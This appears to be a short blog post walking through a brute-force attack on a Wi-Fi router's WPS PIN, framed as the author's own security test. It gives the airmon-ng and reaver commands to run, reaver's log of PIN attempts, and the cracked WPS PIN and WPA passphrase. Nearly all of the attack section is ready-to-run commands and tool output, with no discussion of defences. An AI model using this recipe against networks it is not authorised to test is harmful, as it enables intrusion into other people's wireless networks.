Cracking WPS Wireless network

This is the way I tested the security of a Wireless network with WPS enabled.

Put your wireless card on Monitor mode:

$ sudo airmon-ng start wlan0

Run ‘reaver’ program to crack the WPS:

$ sudo reaver -i mon0 -b 00:11:22:33:44:55 -vv

Replace 00:11:22:33:44:55 with the BSSID of wireless router (with WPS enabled)

You should see these messages:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 1
[+] Associated with 00:11:22:33:44:55 (ESSID: WPS-ROUTER)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK

Many hours later (more than 10h in my case) :

[+] Pin cracked in 38417 seconds
[+] WPS PIN: '77805034'
[+] WPA PSK: '6C0D5A37E7B0A30C'
[+] AP SSID: 'WPS-ROUTER'

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s